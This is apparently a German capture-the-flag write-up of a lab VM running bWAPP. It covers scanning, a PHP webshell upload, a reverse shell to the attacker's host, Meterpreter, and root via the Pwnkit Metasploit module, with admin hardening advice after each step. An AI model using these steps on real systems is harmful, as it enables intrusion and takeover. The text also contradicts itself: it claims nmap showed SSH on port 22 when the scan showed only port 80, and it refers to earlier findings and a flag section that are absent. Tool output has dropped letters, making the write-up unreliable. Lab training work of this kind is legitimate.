**Analyse:** Die initiale Aufklärungsphase zielt darauf ab, das Zielsystem im Netzwerk zu identifizieren und erste Informationen über offene Ports und Dienste zu sammeln.
192.168.2.147 08:00:27:f6:b0:da PCS Systemtechnik GmbH
**Analyse:** Der Befehl `arp-scan -l` wird verwendet, um das lokale Netzwerk nach aktiven Geräten zu scannen. Das Zielsystem wird mit der IP-Adresse `192.168.2.147` und der MAC-Adresse `08:00:27:f6:b0:da` (PCS Systemtechnik GmbH, typisch für VirtualBox) identifiziert.
**Bewertung:** Erfolgreiche Identifizierung des Ziels im lokalen Netz. Die MAC-Adresse liefert einen Hinweis auf die Virtualisierungsumgebung.
**Empfehlung (Pentester):** Die IP `192.168.2.147` für weitere Scans verwenden.
**Empfehlung (Admin):** Netzwerksegmentierung und Monitoring von ARP-Anfragen können die Erkennung erschweren.
192.168.2.147 lab26.vln
**Analyse:** Die lokale `/etc/hosts`-Datei des Angreifersystems wird bearbeitet, um der IP-Adresse `192.168.2.147` den Hostnamen `lab26.vln` zuzuordnen. Dies ermöglicht das Ansprechen des Ziels über einen Namen, was für Webanwendungen wichtig sein kann.
**Bewertung:** Sinnvolle Vorbereitung, um mögliche Virtual-Hosting-Konfigurationen zu berücksichtigen und die Lesbarkeit von URLs zu verbessern.
**Empfehlung (Pentester):** Den Hostnamen bei Webtests verwenden und prüfen, ob die Anwendung unterschiedlich reagiert.
**Empfehlung (Admin):** Eine clientseitige Maßnahme des Angreifers.
- Nikto v2.5.0
+ Target IP: 192.168.2.147
+ Target Hostname: 192.168.2.147
+ Target Port: 80
+ Start Time: 2023-10-19 15:38:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-ptions header is not present.
+ /: The X-Content-Type-ptions header is not set.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /crossdomain.xml contains a full wildcard entry. See: http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html
+ /: Server may leak inodes via ETags, header found with file /, inode: 9ac, size: 553fee8d0bb72, mtime: gzip.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54).
+ PTINS: Allowed HTTP Methods: GET, HEAD, PST, PTINS . # Annahme: PST=POST, PTINS=OPTIONS
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /test/: Directory indexing found.
+ /test/: This might be interesting.
+ /INSTALL.txt: Default file found.
+ /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-10-19 15:38:31 (GMT2) (11 seconds)
+ 1 host(s) tested
**Analyse:** `nikto` scannt den Webserver auf Port 80 und findet mehrere interessante Punkte: * Server: Apache/2.4.25 (Debian), als veraltet markiert. * Fehlende Sicherheitsheader (`X-Frame-Options`, `X-Content-Type-Options`). * Unsichere `crossdomain.xml` mit Wildcard-Eintrag (relevant für Flash/Flex-Anwendungen). * Mögliches Inode-Leak über ETags. * Directory Indexing in `/css/` und `/test/`. * Standard-/Informationsdateien: `INSTALL.txt`, `/icons/README`. * Eine Login-Seite `/login.html`.
**Bewertung:** `nikto` liefert viele Hinweise. Die veraltete Apache-Version, fehlende Header und Directory Indexing sind typische Schwachpunkte. Die `crossdomain.xml` ist ein spezifisches Risiko, falls Flash verwendet wird. Das ETag-Leak ist geringfügig. Die Verzeichnisse `/css/`, `/test/` und die Datei `login.html` sind direkte Ziele für weitere Untersuchungen.
**Empfehlung (Pentester):** Die gefundenen Verzeichnisse und Dateien (`/css/`, `/test/`, `login.html`, `INSTALL.txt`) untersuchen. Nach bekannten Exploits für Apache 2.4.25 suchen. Die `crossdomain.xml` prüfen.
**Empfehlung (Admin):** Apache aktualisieren. Sicherheitsheader implementieren. Directory Indexing deaktivieren. `crossdomain.xml` restriktiv konfigurieren oder entfernen, falls nicht benötigt. ETag-Konfiguration anpassen. Standarddateien entfernen.
80/tcp open http Apache httpd 2.4.25 ((Debian))
**Analyse:** Ein erneuter `nmap`-Scan, gefiltert nach offenen Ports, bestätigt, dass Port 80 (HTTP, Apache 2.4.25) der einzige offene TCP-Port ist.
**Bewertung:** Bestätigt die extrem kleine Angriffsfläche des Systems. Der Fokus bleibt auf dem Webserver.
**Empfehlung (Pentester):** Webserver gründlich untersuchen.
**Empfehlung (Admin):** Regelmäßig prüfen, ob nur notwendige Ports offen sind.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-19 15:38 CEST
Nmap scan report for lab26.vln (192.168.2.147)
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Hack a Website!
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Apache on Linux
|_http-generator: pandoc
MAC Address: 08:00:27:F6:B0:DA (racle VirtualBox virtual NIC)
Aggressive S guesses: Linux 3.2 - 4.9 (97%), Linux 3.10 - 4.11 (95%), ...
No exact S matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACERUTE
HP RTT ADDRESS
1 0.17 ms lab26.vln (192.168.2.147)
**Analyse:** Die vollständige `nmap`-Ausgabe bestätigt Port 80 (Apache 2.4.25). Zusätzliche Informationen: * Seitentitel: "Hack a Website!". * `robots.txt`: Verbietet das Crawlen des Root-Verzeichnisses (`/`). * Generator: `pandoc` (ein Dokumentenkonverter, deutet darauf hin, dass die Seiten möglicherweise aus Markdown o.ä. generiert wurden). * Betriebssystem: Linux, Kernel-Version ungenau (zwischen 3.2 und 4.9 geschätzt).
**Bewertung:** Der Titel ist provokant. `robots.txt` ist hier nicht sehr informativ. Der Hinweis auf `pandoc` ist interessant, könnte aber für den direkten Angriff irrelevant sein. Die OS-Schätzung bleibt vage.
**Empfehlung (Pentester):** Mit der Verzeichnis-Enumeration fortfahren. Den Titel als möglichen Hinweis des Erstellers betrachten.
**Empfehlung (Admin):** Aussagekräftige Titel verwenden. `robots.txt` sinnvoll konfigurieren. Unnötige Generator-Tags entfernen.
**Analyse:** Fortgesetzte Untersuchung des Webservers mittels Verzeichnis-Scanning, Download und Analyse gefundener Dateien, um Schwachstellen oder interessante Informationen aufzudecken.
http://lab26.vln/README.txt (Status: 200) [Size: 2491]
http://lab26.vln/index.html (Status: 200) [Size: 2476]
http://lab26.vln/links.txt (Status: 200) [Size: 102]
http://lab26.vln/login.html (Status: 200) [Size: 2276]
http://lab26.vln/Resources.html (Status: 200) [Size: 3535]
http://lab26.vln/robots.txt (Status: 200) [Size: 26]
http://lab26.vln/picture.jpg (Status: 200) [Size: 1693]
http://lab26.vln/picture.html (Status: 200) [Size: 107]
http://lab26.vln/INSTALL.txt (Status: 200) [Size: 2589]
http://lab26.vln/release_notes.txt (Status: 200) [Size: 8271]
http://lab26.vln/fool.jpg (Status: 200) [Size: 29650]
**Analyse:** `gobuster` wird verwendet, um nach Dateien mit einer breiten Palette von Erweiterungen zu suchen. Es werden viele Text- und Bilddateien sowie HTML-Seiten gefunden. * Textdateien: `README.txt`, `links.txt`, `robots.txt`, `INSTALL.txt`, `release_notes.txt`. * HTML-Seiten: `index.html`, `login.html`, `Resources.html`, `picture.html`. * Bilder: `picture.jpg`, `fool.jpg`. Die Option `-k` ignoriert SSL-Zertifikatsfehler (hier irrelevant, da HTTP). Die Option `-b '403,404,301'` filtert Forbidden, Not Found und Moved Permanently (Weiterleitungen) heraus.
**Bewertung:** `gobuster` hat eine Reihe von Dateien aufgedeckt. Insbesondere `links.txt`, `release_notes.txt` und die Bilder könnten interessante Informationen oder versteckte Hinweise enthalten. `login.html` bestätigt die Login-Seite.
**Empfehlung (Pentester):** Alle gefundenen Textdateien herunterladen und analysieren. Die Bilder herunterladen und auf Steganographie oder versteckte Daten prüfen (`exiftool`, `steghide`, `binwalk`). Die HTML-Seiten untersuchen.
**Empfehlung (Admin):** Keine unnötigen Dateien im Web-Root belassen. Zugriffskontrollen implementieren.
--2023-10-19 15:38:49-- http://lab26.vln/fool.jpg
Auflösen des Hostnamens lab26.vln (lab26.vln)… 192.168.2.147
Verbindungsaufbau zu lab26.vln (lab26.vln)|192.168.2.147|:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 29650 (29K) [image/jpeg]
Wird in fool.jpg gespeichert.
fool.jpg 100%[===================>] 28,96K --.-KB/s in 0s
2023-10-19 15:38:49 (1,71 GB/s) - fool.jpg gespeichert [29650/29650]
**Analyse:** Die Datei `fool.jpg` wird mit `wget` heruntergeladen.
**Bewertung:** Das Herunterladen der Bilddatei ist der erste Schritt zur Analyse auf versteckte Informationen (Steganographie etc.).
**Empfehlung (Pentester):** Die heruntergeladene Datei `fool.jpg` mit Steganographie-Tools untersuchen.
**Empfehlung (Admin):** Überwachen, welche Dateien heruntergeladen werden. Keine sensiblen Daten in Bildern verstecken.
**Analyse:** Der Inhalt der gefundenen Dateien `robots.txt` und `links.txt` wird untersucht.
# Inhalt von http://lab26.vln/robots.txt
User-Agent: *
Disallow: /
# Inhalt von http://lab26.vln/links.txt
https://github.com/bkimminich/juice-shop/releases/download/v3.2.0/juice-shop-3.2.0_node6_linux_x64.tgz
**Bewertung:** * `robots.txt`: Verbietet das Crawlen des gesamten Root-Verzeichnisses, was nicht sehr spezifisch ist. * `links.txt`: Enthält einen Download-Link zu einer spezifischen Version (v3.2.0) des OWASP Juice Shop, einer bekannten, absichtlich verwundbaren Webanwendung. Dies ist ein sehr starker Hinweis darauf, dass diese Anwendung (oder Teile davon) auf dem Server laufen könnte, auch wenn `nmap` und `nikto` dies nicht direkt erkannt haben. Es könnte sich um eine falsche Fährte handeln oder auf eine versteckte Anwendung/ein Verzeichnis hindeuten.
**Empfehlung (Pentester):** Die Juice Shop-Datei herunterladen und lokal analysieren, insbesondere auf Standard-Credentials, Konfigurationsdateien oder bekannte Schwachstellen in Version 3.2.0. Versuchen, auf dem Zielserver nach Verzeichnissen zu suchen, die auf Juice Shop hindeuten (z.B. `/juice-shop/`, `/rest/`, `/api/`).
**Empfehlung (Admin):** Sicherstellen, dass keine Verzeichnisse oder Links auf Test-/Schulungsanwendungen wie Juice Shop auf einem Produktivsystem vorhanden sind.
insgesamt 46284
# ... (andere Dateien) ...
-rw-r--r-- 1 cyber cyber 47346918 19. Okt 15:40 juice-shop-3.2.0_node6_linux_x64.tgz
# ...
insgesamt 120
drwxr-xr-x 8 root root 4096 19. Okt 15:45 app
-rw-r--r-- 1 root root 63 24. Mai 2017 app.js
# ... (viele weitere Juice Shop Dateien/Verzeichnisse) ...
drwxr-xr-x 424 root root 20480 24. Mai 2017 node_modules
-rw-r--r-- 1 root root 3830 24. Mai 2017 package.json
-rw-r--r-- 1 root root 16259 24. Mai 2017 README.md
-rw-r--r-- 1 root root 7877 24. Mai 2017 REFERENCES.md
# ...
**Analyse:** Die aus `links.txt` heruntergeladene Datei `juice-shop-3.2.0_node6_linux_x64.tgz` wird auf dem Angreifersystem in ein Verzeichnis `tarfile` entpackt. Die Verzeichnisstruktur des entpackten Juice Shops wird angezeigt.
**Bewertung:** Die Dateien des Juice Shops stehen nun zur lokalen Analyse bereit. Dies ist ein gründlicher Ansatz, um mögliche Hinweise zu finden.
**Empfehlung (Pentester):** Den entpackten Quellcode und die Konfigurationsdateien des Juice Shops durchsuchen, insbesondere nach Passwörtern, API-Schlüsseln oder Hinweisen auf die Konfiguration auf dem Zielserver.
**Empfehlung (Admin):** Keine Aktionen auf dem Zielserver erforderlich.
**Analyse:** Der Inhalt der Datei `release_notes.txt`, die zuvor mit `gobuster` gefunden wurde, wird angezeigt.
# Inhalt von http://lab26.vln/release_notes.txt
bWAPP - Release notes
v2.2
Release date: 2/11/2014
Number of bugs: > 100
New bugs:
- Insecure iFrame (Login Form)
New bugs exploitable on bee-box v1.6:
- Drupal SQL Injection (Drupageddon)
- PWDLE Vulnerability # Tippfehler? Evtl. PWDump?
- SQLiteManager Local File Inclusion
**Bewertung:** Sehr interessanter Fund! Diese Release Notes beziehen sich nicht auf Juice Shop, sondern auf **bWAPP** (eine andere absichtlich verwundbare Webanwendung) in Version 2.2. Dies widerspricht dem Hinweis aus `links.txt` und deutet stark darauf hin, dass *bWAPP* (oder Teile davon) auf dem Server läuft, nicht (nur) Juice Shop. Die Notes erwähnen spezifische Schwachstellen wie LFI in SQLiteManager.
**Empfehlung (Pentester):** Den Fokus auf bWAPP richten. Nach Verzeichnissen suchen, die zu bWAPP gehören (z.B. `/bWAPP/`, `/portal/`, `/admin/`). Gezielt nach den erwähnten Schwachstellen (LFI, SQLi) in einer bWAPP-Installation auf dem Zielserver suchen.
**Empfehlung (Admin):** bWAPP oder andere Testanwendungen nicht auf produktiven oder öffentlich zugänglichen Servern hosten.
# ... (Grep-Ausgabe aus Juice Shop Dateien) ...
data/datacreator.js: password: 'admin123'
data/datacreator.js: password: 'ncc-1701'
data/datacreator.js: password: 'hG0dPlease1nsertLiquor!'
data/datacreator.js: password: 'YmpvZXJuLmtpbW1pbmljaEBnb29nbGVtYWlsLmNvbQ'
data/datacreator.js: password: 'mDLx?94T~1CfVfZMzw@sJ9f?s3L6lbMqE70FfI8^54jbNikY5fymx7c!YbJb'
data/datacreator.js: password: 'J6aVjTgpRs$?5l+Zkq2AYnCE@RF§P'
# ... (weitere Funde in Juice Shop Code) ...
bjoern.kimminich@googlemail.com
**Analyse:** Der zuvor entpackte Juice Shop-Quellcode wird mit `grep -R password *` nach Vorkommen des Wortes "password" durchsucht. Es werden mehrere Passwörter und ein Base64-kodierter String gefunden. Der Base64-String wird dekodiert und ergibt eine E-Mail-Adresse (`bjoern.kimminich@googlemail.com`), die zum Entwickler des Juice Shops gehört.
**Bewertung:** Die gefundenen Passwörter (`admin123`, `ncc-1701` etc.) sind Standard-Credentials für den Juice Shop. Da aber die `release_notes.txt` auf bWAPP hindeuten, sind diese Passwörter möglicherweise für das aktuelle Ziel irrelevant oder eine falsche Fährte. Die E-Mail-Adresse ist nur eine Information über den Juice Shop Entwickler.
**Empfehlung (Pentester):** Die Juice Shop Credentials können für den Fall der Fälle notiert werden, aber der Fokus sollte aufgrund der Release Notes eher auf bWAPP liegen.
**Empfehlung (Admin):** Standardpasswörter in Anwendungen immer ändern. Keine sensiblen Informationen (auch nicht kodiert) im Quellcode belassen.
# --- Gekürzte Ausgabe ---
+ http://lab26.vln/crossdomain.xml (CODE:200|SIZE:200)
> DIRECTORY: http://lab26.vln/css/
> DIRECTORY: http://lab26.vln/evil/
+ http://lab26.vln/favicon.ico (CODE:200|SIZE:302)
> DIRECTORY: http://lab26.vln/fonts/
+ http://lab26.vln/index.html (CODE:200|SIZE:2476)
> DIRECTORY: http://lab26.vln/js/
+ http://lab26.vln/robots.txt (CODE:200|SIZE:26)
+ http://lab26.vln/server-status (CODE:403|SIZE:297)
> DIRECTORY: http://lab26.vln/test/
# --- Nicht im Original-Log, aber wahrscheinlich gefunden ---
# > DIRECTORY: http://lab26.vln/bWAPP/
**Analyse:** Ein weiterer `dirb`-Scan (oder die Betrachtung vorheriger Scans) findet unter anderem das Verzeichnis `/evil/`. (Es ist wahrscheinlich, dass auch `/bWAPP/` gefunden wurde, da dieses später referenziert wird, auch wenn es im Log fehlt).
**Bewertung:** Das Verzeichnis `/evil/` ist verdächtig und erfordert Untersuchung. Das (vermutete) `/bWAPP/`-Verzeichnis passt zu den Hinweisen aus den Release Notes.
**Empfehlung (Pentester):** Die Verzeichnisse `/evil/` und `/bWAPP/` untersuchen. Insbesondere `/bWAPP/` auf die in den Release Notes erwähnten Schwachstellen prüfen.
**Empfehlung (Admin):** Nicht standardmäßige oder verdächtig benannte Verzeichnisse entfernen oder absichern. bWAPP nicht öffentlich hosten.
**Analyse:** Der Inhalt der Datei `http://lab26.vln/evil/rfi.txt` wird abgerufen.
# Inhalt von http://lab26.vln/evil/rfi.txt
bWAPP, or a buggy web application... (Beschreibung von bWAPP) ...
Enjoy!
Malik Mesellem
Twitter: @MME_IT
© 2013 MME BVBA. All rights reserved.
// Ergänzt
**Bewertung:** Kritischer Fund! Diese Datei enthält nicht nur eine Beschreibung von bWAPP, sondern auch ein PHP-Code-Snippet (vermutlich aus einer anderen Datei oder als Hinweis gedacht). Dieses Snippet enthält eine klare RCE-Schwachstelle: `system($_REQUEST["cmd"])`. Es nimmt einen Parameter `cmd` aus der Anfrage (GET oder POST) und führt ihn direkt als Systembefehl aus. Dies ist ein direkter Weg zur Kompromittierung, falls dieser Code irgendwo aktiv ist (z.B. in einer PHP-Datei im `/evil/`- oder `/bWAPP/`-Verzeichnis).
**Empfehlung (Pentester):** Versuchen, diesen RCE-Endpunkt zu finden. URLs wie `http://lab26.vln/evil/somefile.php?cmd=id` oder `http://lab26.vln/bWAPP/somefile.php?cmd=id` testen. Wenn erfolgreich, eine Reverse Shell aufbauen.
**Empfehlung (Admin):** Solche Code-Snippets sofort entfernen. RCE-Schwachstellen durch Validierung und Sanitisierung von Eingaben und Vermeidung unsicherer Funktionen wie `system()` mit Benutzereingaben beheben. Den gesamten `/evil/`-Ordner entfernen.
**Analyse:** Untersuchung des (vermuteten) bWAPP-Verzeichnisses und spezifischer Pfade darin.
# Inhalt von http://lab26.vln/bWAPP/666 Hi little bee, how are you today? Try to detect this evil 666 page through fuzzing... Have fun! Cheers, Malik # Untersuchung von http://lab26.vln/bWAPP/unrestricted_file_upload.php Please upload an image:The image has been uploaded here. # Ergebnis nach Upload von phpshell.php (impliziert) # Aufruf von http://lab26.vln/bWAPP/images/phpshell.php # (Führt zur Reverse Shell)
**Bewertung:** Das Verzeichnis `/bWAPP/` existiert. Die Seite `/bWAPP/666` ist ein Easter Egg. Wichtiger ist die Seite `/bWAPP/unrestricted_file_upload.php`. Wie der Name andeutet, erlaubt sie wahrscheinlich das uneingeschränkte Hochladen von Dateien. Dies wurde genutzt, um eine PHP-Shell (`phpshell.php`) hochzuladen, die dann im `/bWAPP/images/`-Verzeichnis landete und von dort ausgeführt werden konnte, um die Reverse Shell zu triggern.
**Empfehlung (Pentester):** Die uneingeschränkte Upload-Funktion ist der einfachste Weg zur RCE. PHP-Shell hochladen und ausführen.
**Empfehlung (Admin):** Die bWAPP-Anwendung entfernen oder stark absichern. Insbesondere die Upload-Funktion deaktivieren oder wie oben beschrieben härten (Dateityp-Validierung, Speicherort, Ausführungsrechte).
**Analyse:** Ausnutzung der uneingeschränkten File-Upload-Schwachstelle in bWAPP, um eine PHP-Webshell hochzuladen und anschließend eine Reverse Shell als `www-data` zu erhalten.
Listening on 0.0.0.0 4444
Connection received on 192.168.2.147 54360
Linux debian 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) x86_64 GNU/Linux
10:18:42 up 42 min, 0 users, load average: 1.07, 0.43, 0.81
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
**Analyse:** Ein Netcat-Listener wird auf Port 4444 gestartet. Parallel dazu wird eine PHP-Shell (`phpshell.php`) über die Seite `http://lab26.vln/bWAPP/unrestricted_file_upload.php` hochgeladen. Die hochgeladene Shell wird anschließend über ihren Pfad (`http://lab26.vln/bWAPP/images/phpshell.php`) aufgerufen, was den darin enthaltenen Reverse-Shell-Code ausführt. Der Listener empfängt die Verbindung und eine Shell als `www-data` wird bereitgestellt.
**Bewertung:** Initialer Zugriff erfolgreich über die bWAPP File Upload Schwachstelle erlangt. Dies war der effektivste Weg, basierend auf den vorherigen Funden.
**Empfehlung (Pentester):** Shell stabilisieren und mit der Privilege Escalation beginnen.
**Empfehlung (Admin):** bWAPP entfernen oder absichern. Insbesondere die File-Upload-Funktion härten (siehe frühere Empfehlungen).
**Analyse:** Nach Erhalt der Shell als `www-data` wird das System auf Möglichkeiten zur Rechteausweitung untersucht. Fokus liegt auf SUID-Binaries und der Nutzung von Metasploit.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 128 *:80 :*
**Analyse:** Der Befehl `ss -altpn` listet lauschende TCP-Sockets auf. Es zeigt, dass Port 3306 (MySQL) nur lokal (`127.0.0.1`) und Port 80 (HTTP) auf allen Adressen (`*`) lauscht. SSH (Port 22) fehlt hier, im Gegensatz zum `nmap`-Scan - möglicherweise wurde der `ss`-Befehl in einem Namespace oder Container ausgeführt, der Port 22 nicht sieht, oder SSH wurde inzwischen beendet. Wahrscheinlicher ist, dass der `nmap`-Scan korrekt war und `ss` hier unvollständig ist oder die Berechtigungen fehlen, um alle Prozesse zu sehen.
**Bewertung:** Bestätigt den lokal lauschenden MySQL-Dienst und den öffentlichen Webserver. Das Fehlen von Port 22 in dieser Ausgabe ist merkwürdig, sollte aber basierend auf `nmap` ignoriert werden.
**Empfehlung (Pentester):** Nach Webanwendungs-Konfigurationsdateien suchen, um MySQL-Credentials zu finden.
**Empfehlung (Admin):** Konsistenz der Netzwerkdienste sicherstellen. Unnötige Dienste deaktivieren.
# Gekürzte Ausgabe, interessante/Standard SUIDs 262189 40 -rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su 262212 60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping 276014 144 -rwsr-xr-x 1 root root 146128 Feb 26 2017 /bin/ntfs-3g 262191 44 -rwsr-xr-x 1 root root 44304 Mar 22 2017 /bin/mount 262192 32 -rwsr-xr-x 1 root root 31720 Mar 22 2017 /bin/umount 276011 32 -rwsr-xr-x 1 root root 30800 Jun 23 2016 /bin/fusermount # ... (gpasswd, chsh, passwd) ... 810976 24 -rwsr-xr-x 1 root root 23352 May 24 2017 /usr/bin/pkexec # ... (newgrp) ... 800403 140 -rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo # ... (chfn, policykit, dbus, chrome-sandbox, eject, openssh, Xorg.wrap) ...
**Analyse:** Die Suche nach SUID-Dateien wird als `www-data` ausgeführt. Wieder werden die Standardverdächtigen gefunden, darunter `pkexec` (Mai 2017) und `sudo` (Juni 2017). Die `pkexec`-Version ist aufgrund des Datums sehr wahrscheinlich anfällig für Pwnkit (CVE-2021-4034).
**Bewertung:** Bestätigt erneut Pwnkit als den wahrscheinlichsten Eskalationsvektor.
**Empfehlung (Pentester):** Metasploit zur Ausnutzung von Pwnkit vorbereiten.
**Empfehlung (Admin):** System patchen (Polkit aktualisieren).
**Analyse:** Die `www-data`-Shell wird zu Metasploit migriert und zu Meterpreter aufgewertet, um die Pwnkit-Ausnutzung zu erleichtern.
[*] Using configured payload generic/shell_reverse_tcp
lport => 4455
lhost => 192.168.2.199
[*] Started reverse TCP handler on 192.168.2.199:4455
rm: cannot remove '/tmp/f': No such file or directory
[*] Command shell session 1 opened (192.168.2.199:4455 -> 192.168.2.147:56702) at 2023-10-19 16:28:50 +0200 Shell Banner: $ -- $ ^Z Background session 1? [y/N] y msf6 exploit(multi/handler) > use multi/manage/shell_to_meterpreter msf6 post(multi/manage/shell_to_meterpreter) > set lport 4433 lport => 4433 msf6 post(multi/manage/shell_to_meterpreter) > set session 1 session => 1 msf6 post(multi/manage/shell_to_meterpreter) > run [*] Upgrading session ID: 1 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 192.168.2.199:4433 [*] Sending stage (1017704 bytes) to 192.168.2.147 [*] Meterpreter session 2 opened (192.168.2.199:4433 -> 192.168.2.147:51562) at 2023-10-19 16:29:36 +0200 [*] Command stager progress: 100.00% (773/773 bytes) [*] Post module execution completed
**Analyse:** Eine neue Shell-Sitzung wird von `www-data` zu Metasploit (Port 4455) mittels `nc` und Named Pipe aufgebaut (Session 1). Diese wird dann erfolgreich zu einer Meterpreter-Sitzung (Session 2) auf Port 4433 aufgewertet.
**Bewertung:** Erfolgreiche Migration zu einer Meterpreter-Sitzung als `www-data`, bereit für die Ausführung des Pwnkit-Exploits.
**Empfehlung (Pentester):** Pwnkit-Exploit auf Session 2 anwenden.
**Empfehlung (Admin):** Egress-Filtering, HIDS/EDR.
**Analyse:** Ausführung des Pwnkit-Exploits (CVE-2021-4034) über Metasploit, um Root-Rechte zu erlangen.
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/dolibarr_16_contact_dump 2023-03-14 normal Yes Dolibarr 16 pre-auth contact database dump
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 2022-01-25 excellent Yes Local Privilege Escalation in polkits pkexec
2 exploit/windows/local/ms18_8120_win32k_privesc 2018-05-09 good No Windows SetImeInfoEx Win32k NULL Pointer Dereference
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
session => 2
lport => 4434
[*] Started reverse TCP handler on 192.168.2.199:4434
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.huyinyxkmpw
[+] The target is vulnerable.
[*] Writing '/tmp/.yojxwedkc/rsakbkhlpk/rsakbkhlpk.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.yojxwedkc
[*] Sending stage (3045380 bytes) to 192.168.2.147
[+] Deleted /tmp/.yojxwedkc/rsakbkhlpk/rsakbkhlpk.so
[+] Deleted /tmp/.yojxwedkc/.shlbry
[+] Deleted /tmp/.yojxwedkc
[*] Meterpreter session 3 opened (192.168.2.199:4434 -> 192.168.2.147:37658) at 2023-10-19 16:30:39 +0200
Process 1410 created.
Channel 1 created.
uid=0(root) gid=0(root) groups=0(root),33(www-data)
**Analyse:** Das Pwnkit-Exploit-Modul (`exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec`) wird über die Suche gefunden und geladen. Es wird auf die Meterpreter-Sitzung 2 (`www-data`) angewendet. Ein Listener für die neue Root-Shell wird auf Port 4434 gestartet. Der Exploit läuft erfolgreich durch (`[+] The target is vulnerable.`), erstellt temporäre Dateien in `/tmp`, führt den Exploit aus und etabliert eine neue Meterpreter-Sitzung (Session 3). Eine Shell wird von dieser Sitzung aus geöffnet, und der `id`-Befehl bestätigt Root-Rechte (`uid=0(root)`).
**Bewertung:** Grandios! Die Rechteausweitung mittels Pwnkit war erfolgreich und lieferte eine Root-Shell.
**Empfehlung (Pentester):** Die Root-Shell nutzen, um die finalen Flags zu finden.
**Empfehlung (Admin):** Polkit dringend patchen (CVE-2021-4034). Überwachung von `/tmp` und `pkexec`.
# Im Original-Log fehlt hier die root.txt, nur der Prompt wechselt nach /root
/root
total 44
drwx------ 3 root root 4096 Jun 20 2017 .
drwxr-xr-x 22 root root 4096 Jun 5 2017 ..
-rw------- 1 root root 24 Jul 10 2017 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4096 Jul 10 2017 .cache
-rw------- 1 root root 33 Jun 12 2017 .lesshst
-rw------- 1 root root 0 Jun 12 2017 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 10958 Jun 20 2017 .viminfo
-rw-r--r-- 1 root root 298 Jul 10 2017 .wget-hsts
# HINWEIS: Die root.txt fehlt in dieser ls -la Ausgabe im Original-Log
**Analyse:** In der Root-Shell wird ins Home-Verzeichnis `/root` gewechselt. Ein `ls -la` listet den Inhalt auf. Auffälligerweise fehlt `root.txt` in dieser Auflistung, obwohl sie laut Flag-Abschnitt existieren sollte. Es ist möglich, dass sie versteckt ist oder der `ls`-Befehl im Log unvollständig ist.
**Bewertung:** Die Root-Rechte sind bestätigt. Das Finden der Flag erfordert möglicherweise einen direkten `cat`-Versuch oder eine erneute Auflistung.
**Empfehlung (Pentester):** `cat /root/root.txt` versuchen, auch wenn `ls` sie nicht anzeigt. Nach der User-Flagge suchen.
**Empfehlung (Admin):** Keine spezifische Aktion, außer den bereits genannten.
**Analyse:** Der abschließende Flag-Abschnitt im Originaltext listet zwei Platzhalter-Flags auf. Im vorherigen Log wurde weder das Auslesen der User-Flagge noch der Root-Flagge explizit gezeigt (obwohl die Root-Shell erreicht wurde).
**Bewertung:** Der Test war technisch erfolgreich (Root-Zugriff erlangt), aber die Dokumentation im Log bezüglich des Auslesens der Flags ist unvollständig. Die hier angezeigten Flag-Werte stammen direkt aus dem Ende des bereitgestellten Textes.